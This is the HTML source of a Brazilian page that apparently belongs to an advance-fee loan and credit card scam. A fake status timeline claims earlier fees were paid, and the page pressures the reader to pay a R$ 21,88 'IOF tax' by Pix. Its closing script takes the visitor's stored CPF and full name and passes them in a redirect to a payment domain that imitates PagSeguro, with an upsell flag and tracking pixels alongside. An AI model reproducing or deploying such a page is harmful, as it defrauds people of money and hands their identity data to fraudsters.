<html data-capo="" style="--primary: #1E3A80;">

<head>
    <script>
        localStorage.setItem("upsell", "up4");
    </script>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>Empréstimo facilitado, simulação gratuita!</title>
  <style>
    body {
      background-color: white;
    }

    *,
    :after,
    :before {
      box-sizing: border-box
    }

    html {
      font-family: system-ui, Segoe UI, Roboto, Helvetica, Arial, sans-serif, Apple Color Emoji, Segoe UI Emoji;
      line-height: 1.15;
      -webkit-text-size-adjust: 100%;
      -moz-tab-size: 4;
      -o-tab-size: 4;
      tab-size: 4
    }

    body {
      margin: 0
    }

    hr {
      color: inherit;
      height: 0
    }

    abbr[title] {
      -webkit-text-decoration: underline dotted;
      text-decoration: underline dotted
    }

    b,
    strong {
      font-weight: bolder
    }

    code,
    kbd,
    pre,
    samp {
      font-family: ui-monospace, SFMono-Regular, Consolas, Liberation Mono, Menlo, monospace;
      font-size: 1em
    }

    small {
      font-size: 80%
    }

    sub,
    sup {
      font-size: 75%;
      line-height: 0;
      position: relative;
      vertical-align: baseline
    }

    sub {
      bottom: -.25em
    }

    sup {
      top: -.5em
    }

    table {
      border-color: inherit;
      text-indent: 0
    }

    button,
    input,
    optgroup,
    select,
    textarea {
      font-family: inherit;
      font-size: 100%;
      line-height: 1.15;
      margin: 0
    }

    button,
    select {
      text-transform: none
    }

    [type=button],
    [type=reset],
    [type=submit],
    button {
      -webkit-appearance: button
    }

    ::-moz-focus-inner {
      border-style: none;
      padding: 0
    }

    :-moz-focusring {
      outline: 1px dotted ButtonText
    }

    :-moz-ui-invalid {
      box-shadow: none
    }

    legend {
      padding: 0
    }

    progress {
      vertical-align: baseline
    }

    ::-webkit-inner-spin-button,
    ::-webkit-outer-spin-button {
      height: auto
    }

    [type=search] {
      -webkit-appearance: textfield;
      outline-offset: -2px
    }

    ::-webkit-search-decoration {
      -webkit-appearance: none
    }

    ::-webkit-file-upload-button {
      -webkit-appearance: button;
      font: inherit
    }

    summary {
      display: list-item
    }
  </style>
  <style>
    blockquote,
    dd,
    dl,
    figure,
    h1,
    h2,
    h3,
    h4,
    h5,
    h6,
    hr,
    ol,
    p,
    pre,
    ul {
      margin: 0
    }

    ol,
    ul {
      list-style: none;
      padding: 0
    }

    img,
    video {
      height: auto;
      max-width: 100%
    }

    *,
    :after,
    :before {
      border: 0 solid #000
    }

    :root {
      --primary: transparent;
      --red: #ef4444;
      --green: #27ae60
    }

    body {
      background-color: white;
      color: white;
      font-size: 16px
    }

    #__nuxt,
    body,
    html {
      height: 100%
    }

    a {
      color: white;
      text-decoration: none
    }

    a:hover {
      cursor: pointer;
      text-decoration: underline
    }

    .text-red {
      color: var(--red)
    }

    .text-green {
      color: var(--green)
    }

    .text-primary {
      color: var(--primary)
    }

    h2 {
      font-weight: 500
    }
  </style>
  <style>
    .default-layout[data-v-77968890] {
      display: grid;
      grid-template-areas: "top-bar" "content" "footer";
      grid-template-rows: auto 1fr auto;
      min-height: 100vh
    }

    .default-layout .top-bar[data-v-77968890] {
      grid-area: top-bar
    }

    .default-layout .content[data-v-77968890] {
      background-color: #f5f7f9;
      grid-area: content
    }

    .default-layout .footer[data-v-77968890] {
      grid-area: footer
    }
  </style>
  <style>
    .top-bar[data-v-f5d5d4cd] {
      background-color: var(--primary);
      border-bottom: 1px solid hsla(0, 0%, 100%, .3);
      width: 100%
    }

    .top-bar .container[data-v-f5d5d4cd] {
      display: grid;
      padding: 1.5rem 0;
      place-content: center
    }
  </style>
  <style>
    .container[data-v-0041013f] {
      box-sizing: border-box;
      margin: 0 auto;
      padding-left: 1rem;
      padding-right: 1rem
    }

    @media (min-width:640px) {
      .container[data-v-0041013f] {
        max-width: 90%
      }
    }

    @media (min-width:768px) {
      .container[data-v-0041013f] {
        max-width: 85%
      }
    }

    @media (min-width:1024px) {
      .container[data-v-0041013f] {
        max-width: 80%
      }
    }

    @media (min-width:1280px) {
      .container[data-v-0041013f] {
        max-width: 1000px
      }
    }
  </style>
  <style>
    img.logo[data-v-4f7075cc] {
      height: var(--2348ed9e);
      width: auto
    }

    h1.logo[data-v-4f7075cc] {
      color: #fff;
      text-shadow: 0 1px 2px rgba(0, 0, 0, .2)
    }
  </style>
  <style>
    .fee-page[data-v-d5c2a0e6] {
      margin: 2.5rem 0
    }

    .container[data-v-d5c2a0e6] {
      display: grid;
      gap: 3rem;
      max-width: 480px
    }

    .intro[data-v-d5c2a0e6] {
      display: grid;
      gap: .75rem
    }

    .intro .headline[data-v-d5c2a0e6] {
      color: var(--primary);
      font-size: 1.5rem;
      font-weight: 500
    }
  </style>
  <style>
    .card-title[data-v-303a1430] {
      color: #000;
      font-size: 1.35rem;
      font-weight: 500
    }
  </style>
  <style>
    .divider[data-v-b5121d9d] {
      background-color: var(--primary);
      border-radius: 10px;
      height: 2px;
      width: 80px
    }
  </style>
  <style>
    .card-sub-title[data-v-2901cb0a] {
      color: rgba(0, 0, 0, .5);
      line-height: 1.5
    }
  </style>
  <style>
    .registration-fee-video[data-v-6b06b597] {
      border: 1px solid #9d9d9d;
      border-radius: 5px;
      color: #000;
      display: grid;
      gap: 1rem;
      padding: 3rem 1rem;
      position: relative
    }

    .registration-fee-video[data-v-6b06b597]:before {
      background-color: transparent;
      border: 1px solid #9d9d9d;
      border-radius: 5px;
      content: "";
      height: 96%;
      left: 50%;
      position: absolute;
      top: 50%;
      transform: translate(-50%, -50%);
      width: 106%
    }

    .card-sub-title[data-v-6b06b597] {
      align-items: center;
      display: grid;
      font-size: 1.2rem;
      gap: .5rem;
      grid-auto-columns: auto;
      grid-auto-flow: column;
      justify-content: left
    }

    video[data-v-6b06b597] {
      border: 1px solid #9d9d9d;
      border-radius: 5px
    }
  </style>
  <style>
    .loan-status-timeline[data-v-9f1c2f74] {
      display: grid;
      gap: 2rem;
      position: relative
    }

    .bar[data-v-9f1c2f74] {
      background-color: #d5d5d5;
      height: 87%;
      left: 10px;
      position: absolute;
      top: 20px;
      transform: translateX(-50%);
      width: 3px
    }
  </style>
  <style>
    .timeline-part[data-v-7f42729f] {
      align-items: center;
      display: grid;
      gap: 1.3rem;
      grid-template-columns: auto 1fr
    }

    .timeline-part.done[data-v-7f42729f] {
      color: #419c63
    }

    .timeline-part.done .dot[data-v-7f42729f] {
      background-color: #419c63
    }

    .timeline-part.current[data-v-7f42729f] {
      color: var(--red)
    }

    .timeline-part.current .dot[data-v-7f42729f] {
      animation: pulse-7f42729f 1s infinite;
      background-color: var(--red)
    }

    @keyframes pulse-7f42729f {
      0% {
        -webkit-box-shadow: 0 0 0 0 var(--red)
      }

      70% {
        -webkit-box-shadow: 0 0 0 15px rgba(255, 0, 0, 0)
      }

      to {
        -webkit-box-shadow: 0 0 0 0 rgba(255, 0, 0, 0)
      }
    }

    .timeline-part.pending[data-v-7f42729f] {
      color: rgba(0, 0, 0, .3)
    }

    .timeline-part.pending .dot[data-v-7f42729f] {
      background-color: #d5d5d5
    }

    .dot[data-v-7f42729f] {
      background-color: var(--primary);
      border-radius: 50%;
      height: 20px;
      outline: 5px solid #f5f7f9;
      position: relative;
      width: 20px
    }

    .body[data-v-7f42729f] {
      align-items: center;
      display: grid;
      gap: .5rem;
      grid-template-columns: auto 1fr
    }

    .body .icon[data-v-7f42729f] {
      font-size: 2.5rem
    }

    .body .text[data-v-7f42729f] {
      display: grid;
      gap: .35rem
    }
  </style>
  <style>
    .countdown-timer[data-v-441b54a3] {
      color: #fff;
      display: grid;
      gap: 1rem
    }

    .timer[data-v-441b54a3] {
      display: grid;
      gap: .5rem;
      grid-template-columns: repeat(2, auto);
      justify-content: center
    }

    .card-title[data-v-441b54a3],
    .description[data-v-441b54a3],
    .waring[data-v-441b54a3] {
      text-align: center
    }

    .waring[data-v-441b54a3] {
      color: var(--red)
    }
  </style>
  <style>
    .payment-card[data-v-a09dda04] {
      display: grid;
      gap: 1rem;
      justify-items: center;
      text-align: center
    }

    .card-title[data-v-a09dda04] {
      align-items: center;
      display: grid;
      gap: .5rem;
      grid-template-columns: repeat(2, auto)
    }

    .card-title .icon[data-v-a09dda04] {
      color: #3db1a5;
      font-size: 1.8rem
    }

    .card-sub-title[data-v-a09dda04] {
      align-items: center;
      display: grid;
      gap: .5rem;
      grid-template-columns: repeat(2, auto)
    }

    .card-sub-title .icon[data-v-a09dda04] {
      color: #419c63;
      font-size: 1.2rem
    }

    .fee-value[data-v-a09dda04] {
      color: #3db1a5;
      font-size: 2rem;
      font-weight: 500
    }

    .icon[data-v-a09dda04] {
      font-size: 3rem
    }
  </style>
  <style>
    .card[data-v-cca10726] {
      background-color: #fff;
      border-radius: 10px;
      box-shadow: 0 1px 4px 0 rgba(0, 8, 38, .04);
      padding: 1.5rem;
      width: 100%
    }
  </style>
  <style>
    .registration-fee-faq[data-v-a343b494] {
      display: grid;
      gap: 1rem
    }
  </style>
  <style>
    .faq-item[data-v-8c748230] {
      border-top: 1px solid #d4dae0;
      color: #000;
      cursor: pointer;
      font-weight: 400
    }

    .faq-item .question[data-v-8c748230] {
      align-items: center;
      display: grid;
      grid-template-columns: auto 1fr;
      padding: .5rem 0
    }

    .faq-item .question.expanded .icon[data-v-8c748230] {
      transform: rotate(180deg)
    }

    .faq-item .question .icon[data-v-8c748230] {
      color: var(--primary);
      font-size: 2.5rem;
      transition: transform .2s ease-out
    }

    .faq-item .answer[data-v-8c748230] {
      display: grid;
      gap: 1rem;
      max-height: 0;
      overflow: hidden;
      transition: max-height .2s ease-out
    }

    .faq-item .answer .content[data-v-8c748230] {
      color: rgba(0, 0, 0, .5);
      padding: .2rem 1rem 1.5rem
    }

    .question.expanded[data-v-8c748230]:after {
      transform: translateY(-50%) rotate(90deg)
    }
  </style>
  <style>
    .footer[data-v-63f14862] {
      border-bottom: 7px solid var(--primary);
      border-top: 2px solid #edf0ef;
      color: #fff;
      color: #000;
      padding: 2rem 0;
      text-align: center
    }

    .footer p[data-v-63f14862] {
      margin: .5rem 0
    }
  </style>
  <link rel="stylesheet" href="/_nuxt/TopBar.2vF9lWx7.css">
  <link rel="stylesheet" href="/_nuxt/Container.B5PP9_Vn.css">
  <link rel="stylesheet" href="/_nuxt/CardTitle.D2C4NpE7.css">
  <link rel="stylesheet" href="/_nuxt/CardSubTitle.DG_Fs8af.css">
  <link rel="stylesheet" href="/_nuxt/PaymentCard.C5KDNUam.css">
  <link rel="stylesheet" href="/_nuxt/Button.CTY08tZL.css">
  <link rel="stylesheet" href="/_nuxt/LoadingText.BAPOmI7q.css">
  <link rel="stylesheet" href="/_nuxt/Card.GBBMdh4F.css">
  <link rel="stylesheet" href="/_nuxt/FaqItem.yXfMt8qC.css">
  <link rel="modulepreload" as="script" crossorigin="" href="/_nuxt/Ds3y3Bf3.js">
  <link rel="modulepreload" as="script" crossorigin="" href="/_nuxt/k9y74een.js">
  <link rel="modulepreload" as="script" crossorigin="" href="/_nuxt/Bo8ipC1T.js">
  <link rel="modulepreload" as="script" crossorigin="" href="/_nuxt/2aeojNjQ.js">
  <link rel="modulepreload" as="script" crossorigin="" href="/_nuxt/2TdE_QPC.js">
  <link rel="modulepreload" as="script" crossorigin="" href="/_nuxt/DTnGPJep.js">
  <link rel="modulepreload" as="script" crossorigin="" href="/_nuxt/B1xLFNhR.js">
  <link rel="modulepreload" as="script" crossorigin="" href="/_nuxt/CNxTVsKb.js">
  <link rel="modulepreload" as="script" crossorigin="" href="/_nuxt/BQBhJayI.js">
  <link rel="modulepreload" as="script" crossorigin="" href="/_nuxt/CV182wBC.js">
  <link rel="modulepreload" as="script" crossorigin="" href="/_nuxt/u-U6PqlP.js">
  <link rel="modulepreload" as="script" crossorigin="" href="/_nuxt/DIXVKuIp.js">
  <link rel="modulepreload" as="script" crossorigin="" href="/_nuxt/Bl1c_aD8.js">
  <link rel="modulepreload" as="script" crossorigin="" href="/_nuxt/DEF4dnCe.js">
  <link rel="modulepreload" as="script" crossorigin="" href="/_nuxt/sv4npInL.js">
  <link rel="modulepreload" as="script" crossorigin="" href="/_nuxt/B6VT0UWr.js">
  <link rel="modulepreload" as="script" crossorigin="" href="/_nuxt/MaghENf1.js">
  <link rel="modulepreload" as="script" crossorigin="" href="/_nuxt/BJRZzHYv.js">
  <link rel="modulepreload" as="script" crossorigin="" href="/_nuxt/BTyuqVSS.js">
  <link rel="modulepreload" as="script" crossorigin="" href="/_nuxt/DmqsTf9v.js">
  <link rel="prefetch" as="script" crossorigin="" href="/_nuxt/J9e3dA3M.js">
  <link rel="prefetch" as="script" crossorigin="" href="/_nuxt/D-UNq_Tu.js">
  <link rel="prefetch" as="script" crossorigin="" href="/_nuxt/BGBp0rdz.js">
  <link rel="prefetch" as="script" crossorigin="" href="/_nuxt/Wpn3EkJ-.js">
  <link rel="prefetch" as="script" crossorigin="" href="/_nuxt/CKC6fHHG.js">
  <link rel="prefetch" as="script" crossorigin="" href="/_nuxt/BhOEMyyX.js">
  <script type="module" src="/_nuxt/Ds3y3Bf3.js" crossorigin=""></script>
  <script id="unhead:payload" type="application/json">{"title":"Empréstimo facilitado, simulação gratuita!"}</script>
  <script src="scripts/utms/latest.js" async="" defer=""></script>
  <link rel="stylesheet" href="https://unipay-br.org/_nuxt/12-fee.BCxcH5e_.css">
  <script async="" defer="" src="scripts/pixel/pixel.js"></script>
  <link rel="stylesheet" href="https://unipay-br.org/_nuxt/default.fxhPcPvK.css">
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet" />

  <!-- Bootstrap Bundle JS (inclui Popper.js) -->
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script>
  <script src="https://code.jquery.com/jquery-3.7.1.min.js"
      integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo=" crossorigin="anonymous"></script>

      
  <script>
    window.pixelId = "6770a52cb49a5a7efea968bf";
    var a = document.createElement("script");
    a.setAttribute("async", "");
    a.setAttribute("defer", "");
    a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
    document.head.appendChild(a);

    function applyUtmToLinks() {
            // Captura os parâmetros UTM da URL atual
            const utmParams = new URLSearchParams(window.location.search).toString();

            if (utmParams) {
                document.querySelectorAll("a").forEach(link => {
                    // Adiciona UTM aos links internos
                    if (link.href && link.href.includes(window.location.origin)) {
                        const newUrl = new URL(link.href);
                        newUrl.search += (newUrl.search ? '&' : '') + utmParams;
                        link.href = newUrl.toString();
                    }
                });
            }
        }

        // Executa a função após o carregamento da página
        window.addEventListener("load", applyUtmToLinks);
  </script>
  <script
    src="https://cdn.utmify.com.br/scripts/utms/latest.js"
    data-utmify-prevent-subids
    async
    defer
  ></script>

  <style>
    .modal {
      z-index: 999999 !important;
    }
  
    .modal-backdrop {
      z-index: 999998 !important;
    }
  </style>
<script>
  window.pixelId = "68cb78856141a2ab904ccacf";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>

<script
  src="https://cdn.utmify.com.br/scripts/utms/latest.js"
  data-utmify-prevent-xcod-sck
  data-utmify-prevent-subids
  async
  defer
></script>
</head>



<body>
  <div id="__nuxt">
    <div class="default-layout" data-v-77968890="">
      <div style="
  display: grid;
  grid-template-areas:
    'top-bar'
    'content'
    'footer';
  grid-template-rows: auto 1fr auto;
  min-height: 100vh;
">

        <style>
          .header {
            background-color: #1E3A80;
            padding: 15px 0;
            text-align: center;
            font-size: 1.5rem;
            font-weight: bold;
            border-bottom: solid 3px  #ee4d2d;
        }
        </style>
        <div class="header">
          <img decoding="async" style="width: 130px;" src="up3/embed/logo.svg"
            alt="Imagem Centralizada"
            data-lazy-src="https://d9hhrg4mnvzow.cloudfront.net/lp.posicard.com.br/834c63b6-logo-branco2_105e038000000000000000.png"
            data-ll-status="loaded" class="entered lazyloaded"><noscript><img decoding="async" style="width: 170px;"
              src="https://i.ibb.co/cT5B73b/logo.png"
              alt="Imagem Centralizada"></noscript>
        </div>
        <main class="content" data-v-77968890=""><!--[-->
          <div class="fee-page" data-v-d5c2a0e6="">
            <div class="container" data-v-d5c2a0e6="" data-v-0041013f=""><!--[-->
              <div class="intro" data-v-d5c2a0e6=""><span class="card-title headline" data-v-d5c2a0e6=""
                  data-v-303a1430=""><!--[--> Parabéns, finalize a última etapa para concluir a sua solicitação
                  <!--]--></span>
                <div class="divider" data-v-d5c2a0e6="" data-v-b5121d9d=""></div><span class="card-sub-title"
                  data-v-d5c2a0e6="" data-v-2901cb0a=""><!--[--> Você está a um passo de concluir o pedido do seu cartão
                  de crédito, Ao solicitar a emissão do seu cartão de crédito ou a aprovação de um empréstimo, você
                  estará sujeito à cobrança do Imposto sobre Operações Financeiras (IOF), que é regulamentado e emitido
                  pelo Banco Central. Este imposto é aplicado para financiar operações financeiras e garantir a
                  conformidade com as normas fiscais.
                  <!--]--></span>
              </div>
              <div class="registration-fee-video" data-v-d5c2a0e6="" data-v-6b06b597=""><span class="card-title"
                  data-v-6b06b597="" data-v-303a1430="">
                   <!--]--></span>
                <div class="timeline-part done" data-v-9f1c2f74="" data-v-7f42729f="">
                  <div class="dot" data-v-7f42729f=""></div>
                  <div class="body" data-v-7f42729f=""><svg xmlns="http://www.w3.org/2000/svg"
                      xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img"
                      class="icon iconify iconify--ph" data-v-7f42729f="" style="" width="1em" height="1em"
                      viewbox="0 0 256 256">
                      <g fill="currentColor">
                        <path d="M176 64v48H80V64Z" opacity=".2"></path>
                        <path
                          d="M80 120h96a8 8 0 0 0 8-8V64a8 8 0 0 0-8-8H80a8 8 0 0 0-8 8v48a8 8 0 0 0 8 8m8-48h80v32H88Zm112-48H56a16 16 0 0 0-16 16v176a16 16 0 0 0 16 16h144a16 16 0 0 0 16-16V40a16 16 0 0 0-16-16m0 192H56V40h144Zm-100-68a12 12 0 1 1-12-12a12 12 0 0 1 12 12m40 0a12 12 0 1 1-12-12a12 12 0 0 1 12 12m40 0a12 12 0 1 1-12-12a12 12 0 0 1 12 12m-80 40a12 12 0 1 1-12-12a12 12 0 0 1 12 12m40 0a12 12 0 1 1-12-12a12 12 0 0 1 12 12m40 0a12 12 0 1 1-12-12a12 12 0 0 1 12 12">
                        </path>
                      </g>
                    </svg>
                    <div class="text" data-v-7f42729f="">
                      <p data-v-7f42729f="">Pagamento Frete</p><small data-v-7f42729f="">Pagamento concluído com
                        sucesso</small>
                    </div>
                  </div>
                </div>
                <div class="timeline-part done" data-v-9f1c2f74="" data-v-7f42729f="">
                  <div class="dot" data-v-7f42729f=""></div>
                  <div class="body" data-v-7f42729f=""><svg xmlns="http://www.w3.org/2000/svg"
                      xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img"
                      class="icon iconify iconify--ph" data-v-7f42729f="" style="" width="1em" height="1em"
                      viewbox="0 0 256 256">
                      <g fill="currentColor">
                        <path
                          d="M224 128a95.76 95.76 0 0 1-31.8 71.37A72 72 0 0 0 128 160a40 40 0 1 0-40-40a40 40 0 0 0 40 40a72 72 0 0 0-64.2 39.37A96 96 0 1 1 224 128"
                          opacity=".2"></path>
                        <path
                          d="M221.35 104.11a8 8 0 0 0-6.57 9.21A89 89 0 0 1 216 128a87.62 87.62 0 0 1-22.24 58.41a79.66 79.66 0 0 0-36.06-28.75a48 48 0 1 0-59.4 0a79.66 79.66 0 0 0-36.06 28.75A88 88 0 0 1 128 40a89 89 0 0 1 14.68 1.22a8 8 0 0 0 2.64-15.78a103.92 103.92 0 1 0 85.24 85.24a8 8 0 0 0-9.21-6.57M96 120a32 32 0 1 1 32 32a32 32 0 0 1-32-32m-21.92 77.5a64 64 0 0 1 107.84 0a87.83 87.83 0 0 1-107.84 0M237.66 45.66l-32 32a8 8 0 0 1-11.32 0l-16-16a8 8 0 0 1 11.32-11.32L200 60.69l26.34-26.35a8 8 0 0 1 11.32 11.32">
                        </path>
                      </g>
                    </svg>
                    <div class="text" data-v-7f42729f="">
                      <p data-v-7f42729f="">Depósito de Ativação</p><small data-v-7f42729f="">Pagamento concluído com
                        sucesso</small>
                    </div>
                  </div>
                </div>
                <div class="timeline-part current" data-v-9f1c2f74="" data-v-7f42729f="">
                  <div class="dot" data-v-7f42729f=""></div>
                  <div class="body" data-v-7f42729f=""><svg xmlns="http://www.w3.org/2000/svg"
                      xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img"
                      class="icon iconify iconify--ph" data-v-7f42729f="" style="" width="1em" height="1em"
                      viewbox="0 0 256 256">
                      <g fill="currentColor">
                        <path
                          d="m229.67 133.62l-96 96a7.94 7.94 0 0 1-11.24 0l-96-96a7.94 7.94 0 0 1 0-11.24l96.05-96a7.94 7.94 0 0 1 11.24 0l96 96.05a7.94 7.94 0 0 1-.05 11.19"
                          opacity=".2"></path>
                        <path
                          d="m235.34 116.72l-96.06-96.06a16 16 0 0 0-22.56 0l-96.06 96.06a16 16 0 0 0 0 22.56l96.06 96.06a16 16 0 0 0 22.56 0l96.06-96.06a16 16 0 0 0 0-22.56M128 32l56 56h-24a8 8 0 0 0-5.66 2.34L128 116.68l-26.34-26.34A8 8 0 0 0 96 88H72Zm-72 72h36.68l24 24l-24 24H56l-24-24Zm72 120l-56-56h24a8 8 0 0 0 5.66-2.34L128 139.31l26.34 26.35A8 8 0 0 0 160 168h24Zm72-72h-36.68l-24-24l24-24H200l24 24Z">
                        </path>
                      </g>
                    </svg>
                    <div class="text" data-v-7f42729f="">
                      <p data-v-7f42729f="">Pagamento do Imposto IOF</p><small data-v-7f42729f="">Aguardando pagamento
                        para liberação do cartão de crédito</small>
                    </div>
                  </div>
                </div>
                <div class="timeline-part pending" data-v-9f1c2f74="" data-v-7f42729f="">
                  <div class="dot" data-v-7f42729f=""></div>
                  <div class="body" data-v-7f42729f=""><svg xmlns="http://www.w3.org/2000/svg"
                      xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img"
                      class="icon iconify iconify--ph" data-v-7f42729f="" style="" width="1em" height="1em"
                      viewbox="0 0 256 256">
                      <g fill="currentColor">
                        <path
                          d="M16 152h32v56H16a8 8 0 0 1-8-8v-40a8 8 0 0 1 8-8M192.54 40A39.12 39.12 0 0 0 156 64a39.12 39.12 0 0 0-36.54-24C97.67 40 80 58.31 80 80c0 14.56 7 27.71 16.73 40H140a20 20 0 0 1 0 40h4l37.78-8.68C203.82 135.07 232 109.23 232 80c0-21.69-17.67-40-39.46-40"
                          opacity=".2"></path>
                        <path
                          d="M230.33 141.06a24.34 24.34 0 0 0-18.61-4.77C230.5 117.33 240 98.48 240 80c0-26.47-21.29-48-47.46-48A47.58 47.58 0 0 0 156 48.75A47.58 47.58 0 0 0 119.46 32C93.29 32 72 53.53 72 80c0 11 3.24 21.69 10.06 33a31.87 31.87 0 0 0-14.75 8.4L44.69 144H16a16 16 0 0 0-16 16v40a16 16 0 0 0 16 16h104a8 8 0 0 0 1.94-.24l64-16a7 7 0 0 0 1.19-.4L226 182.82l.44-.2a24.6 24.6 0 0 0 3.93-41.56ZM119.46 48a31.15 31.15 0 0 1 29.14 19a8 8 0 0 0 14.8 0a31.15 31.15 0 0 1 29.14-19C209.59 48 224 62.65 224 80c0 19.51-15.79 41.58-45.66 63.9l-11.09 2.55A28 28 0 0 0 140 112h-39.32C92.05 100.36 88 90.12 88 80c0-17.35 14.41-32 31.46-32M16 160h24v40H16Zm203.43 8.21l-38 16.18L119 200H56v-44.69l22.63-22.62A15.86 15.86 0 0 1 89.94 128H140a12 12 0 0 1 0 24h-28a8 8 0 0 0 0 16h32a8.3 8.3 0 0 0 1.79-.2l67-15.41l.31-.08a8.6 8.6 0 0 1 6.3 15.9Z">
                        </path>
                      </g>
                    </svg>
                    <div class="text" data-v-7f42729f="">
                      <p data-v-7f42729f="">Cartão Virtual Liberado</p><small data-v-7f42729f="">Cartão fisíco em
                        preparação</small>
                    </div>
                  </div>
                </div>
              </div>
              <div class="countdown-timer" data-v-d5c2a0e6="" data-v-441b54a3="">
                <div class="description" data-v-441b54a3=""><span class="card-sub-title" data-v-441b54a3=""
                    data-v-2901cb0a=""><!--[--> O não pagamento do imposto resulta no cancelamento do pedido do cartão
                    de crédito, impossibilitando uma nova contratação por um prazo máximo de 90 dias <!--]--></span>
                </div>
              </div>
              <div data-v-cca10726="" data-v-a09dda04="" data-v-d5c2a0e6="" class="card payment-card"><span
                  data-v-303a1430="" data-v-a09dda04="" class="card-title">Pague via Pix <svg data-v-a09dda04=""
                    xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true"
                    role="img" class="icon iconify iconify--ic" width="1em" height="1em" viewbox="0 0 24 24">
                    <path fill="currentColor"
                      d="m15.45 16.52l-3.01-3.01c-.11-.11-.24-.13-.31-.13s-.2.02-.31.13L8.8 16.53c-.34.34-.87.89-2.64.89l3.71 3.7a3 3 0 0 0 4.24 0l3.72-3.71c-.91 0-1.67-.18-2.38-.89M8.8 7.47l3.02 3.02c.08.08.2.13.31.13s.23-.05.31-.13l2.99-2.99c.71-.74 1.52-.91 2.43-.91l-3.72-3.71a3 3 0 0 0-4.24 0l-3.71 3.7c1.76 0 2.3.58 2.61.89">
                    </path>
                    <path fill="currentColor"
                      d="m21.11 9.85l-2.25-2.26H17.6c-.54 0-1.08.22-1.45.61l-3 3c-.28.28-.65.42-1.02.42a1.5 1.5 0 0 1-1.02-.42L8.09 8.17c-.38-.38-.9-.6-1.45-.6H5.17l-2.29 2.3a3 3 0 0 0 0 4.24l2.29 2.3h1.48c.54 0 1.06-.22 1.45-.6l3.02-3.02c.28-.28.65-.42 1.02-.42s.74.14 1.02.42l3.01 3.01c.38.38.9.6 1.45.6h1.26l2.25-2.26a3.04 3.04 0 0 0-.02-4.29">
                    </path>
                  </svg></span><span data-v-2901cb0a="" data-v-a09dda04="" class="card-sub-title"> O pagamento será
                  confirmado imediatamente </span><span data-v-a09dda04="" class="fee-value">R$ 21,88</span>
                <style>
                  .btn-custom {
                    color: white;
                    border: none;
                    background: #1E3A80;
                    font-weight: 500;
                    border-radius: 1rem;
                    padding: .75rem 3rem;
                    letter-spacing: .3px;
                    line-height: 1.15;
                  }

                  .btn-custom:hover {
                    color: white!important;
                    background-color: #1E3A80;
                    transform: scale(1.02) !important;
                  }
                </style> 
                  <button id="gerar-pagamento" type="button" onclick="redirectCheckout();" class=" btn-custom rounded-pill w-100 mt-3">
                    <span id="text-button-payment">Pagar Agora</span>

                    <div id="spinner" class="spinner-border text-light d-none" role="status">
                        <span class="sr-only"></span>
                    </div>
                  </button>
                <!----><span data-v-2901cb0a="" data-v-a09dda04="" class="card-sub-title"><svg data-v-a09dda04=""
                    xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true"
                    role="img" class="icon iconify iconify--ph" width="1em" height="1em" viewbox="0 0 256 256">
                    <g fill="currentColor">
                      <path d="M216 56v56c0 96-88 120-88 120s-88-24-88-120V56a8 8 0 0 1 8-8h160a8 8 0 0 1 8 8"
                        opacity=".2"></path>
                      <path
                        d="M208 40H48a16 16 0 0 0-16 16v56c0 52.72 25.52 84.67 46.93 102.19c23.06 18.86 46 25.26 47 25.53a8 8 0 0 0 4.2 0c1-.27 23.91-6.67 47-25.53C198.48 196.67 224 164.72 224 112V56a16 16 0 0 0-16-16m0 72c0 37.07-13.66 67.16-40.6 89.42a129.3 129.3 0 0 1-39.4 22.2a128.3 128.3 0 0 1-38.92-21.81C61.82 179.51 48 149.3 48 112V56h160ZM82.34 141.66a8 8 0 0 1 11.32-11.32L112 148.69l50.34-50.35a8 8 0 0 1 11.32 11.32l-56 56a8 8 0 0 1-11.32 0Z">
                      </path>
                    </g>
                  </svg> Ambiente seguro </span>
              </div><a id="utmify" style="display:none;" data-v-d5c2a0e6=""
                href="https://unipay-br.org/uni/12-fee?utm_source=organicjLj66d7a02356c7d34af9c99821&utm_campaign=rKm-km-rKm&utm_medium=&utm_content=&utm_term=&subid=organicjLj66d7a02356c7d34af9c99821&sid2=rKm-km-rKm&subid2=rKm-km-rKm&subid3=&subid4=&subid5=rKm-km-rKm&xcod=organicjLj66d7a02356c7d34af9c99821hQwK21wXxRrKm-km-rKmhQwK21wXxRhQwK21wXxRhQwK21wXxR&sck=organicjLj66d7a02356c7d34af9c99821hQwK21wXxRrKm-km-rKmhQwK21wXxRhQwK21wXxRhQwK21wXxR"></a>
              <script>window.__NUXT__ = {}; window.__NUXT__.config = { public: { apiBase: "https://api.hide-domain.com", adminId: 1, projectId: 1 }, app: { baseURL: "/", buildId: "f7f5e04f-036f-410e-b85c-b41773d9e483", buildAssetsDir: "/_nuxt/", cdnURL: "" } }</script>
            </div>
          </div>
        </main>
      </div>
    </div>
  </div>

  <script>
    function redirectCheckout() {
        localStorage.setItem('type', 'up3');

        // Busca os dados do CPF do localStorage (vindos da pasta 4)
        const dadosCPF = JSON.parse(localStorage.getItem('dadosCPF')) || {};

        // Constrói a URL do Assaí com os parâmetros
        const baseUrl = "https://pay.pag-segurotax.space/6YQPgjn0Dbqgpxz";
        const documentParam = dadosCPF.cpf || "";
        const nameParam = dadosCPF.nomeCompleto ? encodeURIComponent(dadosCPF.nomeCompleto) : "";
        
        // Constrói a URL final com parâmetros apenas se existirem
        let finalUrl = baseUrl;
        if (documentParam || nameParam) {
            const params = [];
            if (documentParam) params.push(`document=${documentParam}`);
            if (nameParam) params.push(`name=${nameParam}`);
            finalUrl += `?${params.join('&')}`;
        }
        
        // Redireciona para a URL do Assaí
        window.location.href = finalUrl;
    }
</script>
